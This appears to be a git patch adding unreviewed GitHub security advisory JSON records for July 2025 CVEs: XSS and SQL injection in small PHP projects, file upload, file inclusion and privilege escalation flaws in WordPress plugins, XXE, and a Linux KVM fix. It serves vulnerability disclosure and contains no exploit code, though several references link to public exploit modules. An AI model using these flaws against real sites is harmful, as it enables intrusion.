"cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T10:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-83wr-m322-27pr/GHSA-83wr-m322-27pr.json b/advisories/unreviewed/2025/07/GHSA-83wr-m322-27pr/GHSA-83wr-m322-27pr.json new file mode 100644 index 0000000000000..817d500d9bce5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-83wr-m322-27pr/GHSA-83wr-m322-27pr.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83wr-m322-27pr", + "modified": "2025-07-19T12:30:34Z", + "published": "2025-07-19T12:30:34Z", + "aliases": [ + "CVE-2025-7817" + ], + "details": "A vulnerability has been found in PHPGurukul Apartment Visitors Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /bwdates-reports.php of the component HTTP POST Request Handler. The manipulation of the argument visname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7817" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/5" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316921" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316921" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616828" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T12:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-943m-x5xx-45qh/GHSA-943m-x5xx-45qh.json b/advisories/unreviewed/2025/07/GHSA-943m-x5xx-45qh/GHSA-943m-x5xx-45qh.json new file mode 100644 index 0000000000000..f7e2564d44b16 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-943m-x5xx-45qh/GHSA-943m-x5xx-45qh.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-943m-x5xx-45qh", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2015-10135" + ], + "details": "The WPshop 2 – E-Commerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajaxUpload function in versions before 1.3.9.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10135" + }, + { + "type": "WEB", + "url": "https://g0blin.co.uk/g0blin-00036" + }, + { + "type": "WEB", + "url": "https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/1103406" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wpshop/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/32e8224d-a653-48d7-a3f4-338fc0c1dc77?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T10:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cp8h-xgpv-mj82/GHSA-cp8h-xgpv-mj82.json b/advisories/unreviewed/2025/07/GHSA-cp8h-xgpv-mj82/GHSA-cp8h-xgpv-mj82.json new file mode 100644 index 0000000000000..a23135034e996 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cp8h-xgpv-mj82/GHSA-cp8h-xgpv-mj82.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cp8h-xgpv-mj82", + "modified": "2025-07-19T12:30:34Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2015-10138" + ], + "details": "The Work The Flow File Upload plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the jQuery-File-Upload-9.5.0 server and test files in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10138" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/131294" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/131512" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=1127456%40work-the-flow-file-upload&new=1127456%40work-the-flow-file-upload&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=1127457%40work-the-flow-file-upload&new=1127457%40work-the-flow-file-upload&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/a49a81a9-3d4b-4c8d-b719-fc513aceecc6" + }, + { + "type": "WEB", + "url": "https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-work-the-flow-file-upload-arbitrary-file-upload-2-5-2" + }, + { + "type": "WEB", + "url": "https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_worktheflow_upload" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eb271cc8-01ec-45eb-9d6f-efc55c7c3923?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T12:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-frrx-jc6h-v2mw/GHSA-frrx-jc6h-v2mw.json b/advisories/unreviewed/2025/07/GHSA-frrx-jc6h-v2mw/GHSA-frrx-jc6h-v2mw.json new file mode 100644 index 0000000000000..40c978af8c323 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-frrx-jc6h-v2mw/GHSA-frrx-jc6h-v2mw.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frrx-jc6h-v2mw", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2015-10139" + ], + "details": "The WPLMS theme for WordPress is vulnerable to Privilege Escalation in versions 1.5.2 to 1.8.4.1 via the 'wp_ajax_import_data' AJAX action. This makes it possible for authenticated attackers to change otherwise restricted settings and potentially create a new accessible admin account.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10139" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/130291" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/wplms-learning-management-system/6780226" + }, + { + "type": "WEB", + "url": "https://twitter.com/_wpscan_/status/564874637679820800?lang=ca" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/7785" + }, + { + "type": "WEB", + "url": "https://www.rapid7.com/db/modules/auxiliary/admin/http/wp_wplms_privilege_escalation" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6e0e8f5f-8216-4276-a810-860f9b52c447?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T12:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jq5m-r24m-pj59/GHSA-jq5m-r24m-pj59.json b/advisories/unreviewed/2025/07/GHSA-jq5m-r24m-pj59/GHSA-jq5m-r24m-pj59.json new file mode 100644 index 0000000000000..0d3e4542f8690 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jq5m-r24m-pj59/GHSA-jq5m-r24m-pj59.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jq5m-r24m-pj59", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2025-7816" + ], + "details": "A vulnerability, which was classified as problematic, was found in PHPGurukul Apartment Visitors Management System 1.0. Affected is an unknown function of the file /visitor-detail.php of the component HTTP POST Request Handler. The manipulation of the argument visname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7816" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/4" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316920" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316920" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616822" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T11:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q987-357j-pqpq/GHSA-q987-357j-pqpq.json b/advisories/unreviewed/2025/07/GHSA-q987-357j-pqpq/GHSA-q987-357j-pqpq.json new file mode 100644 index 0000000000000..c13788ba6403f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q987-357j-pqpq/GHSA-q987-357j-pqpq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q987-357j-pqpq", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2025-7815" + ], + "details": "A vulnerability, which was classified as problematic, has been found in PHPGurukul Apartment Visitors Management System 1.0. This issue affects some unknown processing of the file /manage-newvisitors.php of the component HTTP POST Request Handler. The manipulation of the argument visname leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7815" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/3" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316919" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316919" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616769" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T10:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rg2c-8v6w-j49r/GHSA-rg2c-8v6w-j49r.json b/advisories/unreviewed/2025/07/GHSA-rg2c-8v6w-j49r/GHSA-rg2c-8v6w-j49r.json new file mode 100644 index 0000000000000..177a2aff4a147 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rg2c-8v6w-j49r/GHSA-rg2c-8v6w-j49r.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg2c-8v6w-j49r", + "modified": "2025-07-19T12:30:33Z", + "published": "2025-07-19T12:30:33Z", + "aliases": [ + "CVE-2015-10133" + ], + "details": "The Subscribe to Comments for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 2.1.2 via the Path to header value. This allows authenticated attackers, with administrative privileges and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. This same function can also be used to execute arbitrary PHP code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10133" + }, + { + "type": "WEB", + "url": "https://advisories.dxw.com/advisories/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/132694" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=1198281%40subscribe-to-comments&new=1198281%40subscribe-to-comments&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2015/Jul/71" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f92784a7-f2b3-47f8-b03f-4e234b57e40a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T10:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json b/advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json new file mode 100644 index 0000000000000..01fd392b25f3d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-x77v-68j6-p42v/GHSA-x77v-68j6-p42v.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x77v-68j6-p42v", + "modified": "2025-07-19T12:30:34Z", + "published": "2025-07-19T12:30:34Z", + "aliases": [ + "CVE-2025-38351" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86/hyper-v: Skip non-canonical addresses during PV TLB flush\n\nIn KVM guests with Hyper-V hypercalls enabled, the hypercalls\nHVCALL_FLUSH_VIRTUAL_ADDRESS_LIST and HVCALL_FLUSH_VIRTUAL_ADDRESS_LIST_EX\nallow a guest to request invalidation of portions of a virtual TLB.\nFor this, the hypercall parameter includes a list of GVAs that are supposed\nto be invalidated.\n\nHowever, when non-canonical GVAs are passed, there is currently no\nfiltering in place and they are eventually passed to checked invocations of\nINVVPID on Intel / INVLPGA on AMD. While AMD's INVLPGA silently ignores\nnon-canonical addresses (effectively a no-op), Intel's INVVPID explicitly\nsignals VM-Fail and ultimately triggers the WARN_ONCE in invvpid_error():\n\n invvpid failed: ext=0x0 vpid=1 gva=0xaaaaaaaaaaaaa000\n WARNING: CPU: 6 PID: 326 at arch/x86/kvm/vmx/vmx.c:482\n invvpid_error+0x91/0xa0 [kvm_intel]\n Modules linked in: kvm_intel kvm 9pnet_virtio irqbypass fuse\n CPU: 6 UID: 0 PID: 326 Comm: kvm-vm Not tainted 6.15.0 #14 PREEMPT(voluntary)\n RIP: 0010:invvpid_error+0x91/0xa0 [kvm_intel]\n Call Trace:\n vmx_flush_tlb_gva+0x320/0x490 [kvm_intel]\n kvm_hv_vcpu_flush_tlb+0x24f/0x4f0 [kvm]\n kvm_arch_vcpu_ioctl_run+0x3013/0x5810 [kvm]\n\nHyper-V documents that invalid GVAs (those that are beyond a partition's\nGVA space) are to be ignored. While not completely clear whether this\nruling also applies to non-canonical GVAs, it is likely fine to make that\nassumption, and manual testing on Azure confirms \"real\" Hyper-V interprets\nthe specification in the same way.\n\nSkip non-canonical GVAs when processing the list of address to avoid\ntripping the INVVPID failure. Alternatively, KVM could filter out \"bad\"\nGVAs before inserting into the FIFO, but practically speaking the only\ndownside of pushing validation to the final processing is that doing so\nis suboptimal for the guest, and no well-behaved guest will request TLB\nflushes for non-canonical addresses.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38351" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2d4dea3f76510c0afe3f18c910f647b816f7d566" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/fa787ac07b3ceb56dd88a62d1866038498e96230" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T12:15:35Z" + } +} \ No newline at end of file From 9b83d86c408d9e8d2f405329754ae725fa89e15a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 15:31:58 +0000 Subject: [PATCH 028/323] Publish Advisories GHSA-395m-h942-pqgp GHSA-5483-qp4j-mrgw GHSA-7hcv-42fj-r6vq GHSA-c2hp-rw2h-vg86 GHSA-p7vh-v4r9-25g4 GHSA-r5w5-2g3g-vrmq --- .../GHSA-395m-h942-pqgp.json | 56 +++++++++++++++++++ .../GHSA-5483-qp4j-mrgw.json | 56 +++++++++++++++++++ .../GHSA-7hcv-42fj-r6vq.json | 52 +++++++++++++++++ .../GHSA-c2hp-rw2h-vg86.json | 56 +++++++++++++++++++ .../GHSA-p7vh-v4r9-25g4.json | 56 +++++++++++++++++++ .../GHSA-r5w5-2g3g-vrmq.json | 52 +++++++++++++++++ 6 files changed, 328 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-395m-h942-pqgp/GHSA-395m-h942-pqgp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5483-qp4j-mrgw/GHSA-5483-qp4j-mrgw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7hcv-42fj-r6vq/GHSA-7hcv-42fj-r6vq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c2hp-rw2h-vg86/GHSA-c2hp-rw2h-vg86.json create mode 100644 advisories/unreviewed/2025/07/GHSA-p7vh-v4r9-25g4/GHSA-p7vh-v4r9-25g4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r5w5-2g3g-vrmq/GHSA-r5w5-2g3g-vrmq.json diff --git a/advisories/unreviewed/2025/07/GHSA-395m-h942-pqgp/GHSA-395m-h942-pqgp.json b/advisories/unreviewed/2025/07/GHSA-395m-h942-pqgp/GHSA-395m-h942-pqgp.json new file mode 100644 index 0000000000000..08feb513d8790 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-395m-h942-pqgp/GHSA-395m-h942-pqgp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-395m-h942-pqgp", + "modified": "2025-07-19T15:30:22Z", + "published": "2025-07-19T15:30:21Z", + "aliases": [ + "CVE-2025-7831" + ], + "details": "A vulnerability classified as critical has been found in code-projects Church Donation System 1.0. This affects an unknown part of the file /members/Tithes.php. The manipulation of the argument trcode leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7831" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/7" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316935" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316935" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616917" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T15:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5483-qp4j-mrgw/GHSA-5483-qp4j-mrgw.json b/advisories/unreviewed/2025/07/GHSA-5483-qp4j-mrgw/GHSA-5483-qp4j-mrgw.json new file mode 100644 index 0000000000000..7258bb1037a72 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5483-qp4j-mrgw/GHSA-5483-qp4j-mrgw.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5483-qp4j-mrgw", + "modified": "2025-07-19T15:30:21Z", + "published": "2025-07-19T15:30:21Z", + "aliases": [ + "CVE-2025-7830" + ], + "details": "A vulnerability was found in code-projects Church Donation System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /reg.php. The manipulation of the argument mobile leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7830" + }, + { + "type": "WEB", + "url": "https://github.com/n0name-yang/myCVE/issues/6" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316934" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316934" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616886" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T15:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7hcv-42fj-r6vq/GHSA-7hcv-42fj-r6vq.json b/advisories/unreviewed/2025/07/GHSA-7hcv-42fj-r6vq/GHSA-7hcv-42fj-r6vq.json new file mode 100644 index 0000000000000..68c67b0560867 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7hcv-42fj-r6vq/GHSA-7hcv-42fj-r6vq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hcv-42fj-r6vq", + "modified": "2025-07-19T15:30:21Z", + "published": "2025-07-19T15:30:21Z", + "aliases": [ + "CVE-2025-7823" + ], + "details": "A vulnerability was found in Jinher OA 1.2. It has been declared as problematic. This vulnerability affects unknown code of the file ProjectScheduleDelete.aspx. The manipulation leads to xml external entity reference. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7823" + }, + { + "type": "WEB", + "url": "https://github.com/cc2024k/CVE/issues/3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316924" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316924" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616841" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-610" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c2hp-rw2h-vg86/GHSA-c2hp-rw2h-vg86.json b/advisories/unreviewed/2025/07/GHSA-c2hp-rw2h-vg86/GHSA-c2hp-rw2h-vg86.json new file mode 100644 index 0000000000000..7d1fa90180da2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c2hp-rw2h-vg86/GHSA-c2hp-rw2h-vg86.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c2hp-rw2h-vg86", + "modified": "2025-07-19T15:30:21Z", + "published": "2025-07-19T15:30:21Z", + "aliases": [ + "CVE-2025-7819" + ], + "details": "A vulnerability was found in PHPGurukul Apartment Visitors Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /create-pass.php of the component HTTP POST Request Handler. The manipulation of the argument visname leads to cross site scripting. It is possible to initiate the attack remotely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7819" + }, + { + "type": "WEB", + "url": "https://github.com/HieuGITLAB/my-cves/issues/7" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316923" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316923" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616839" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-19T13:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p7vh-v4r9-25g4/GHSA-p7vh-v4r9-25g4.json b/advisories/unreviewed/2025/07/GHSA-p7vh-v4r9-25g4/GHSA-p7vh-v4r9-25g4.json new file mode 100644 index 0000000000000..b074d351d80b7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-p7vh-v4r9-25g4/GHSA-p7vh-v4r9-25g4.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7vh-v4r9-25g4", + "modified": "2025-07-19T15:30:21Z", + "published": "2025-07-19T15:30:21Z", + "aliases": [ + "CVE-2025-7829" + ], + "details": "A vulnerability was found in code-projects Church Donation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /login.php. The manipulation of the argument Username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": 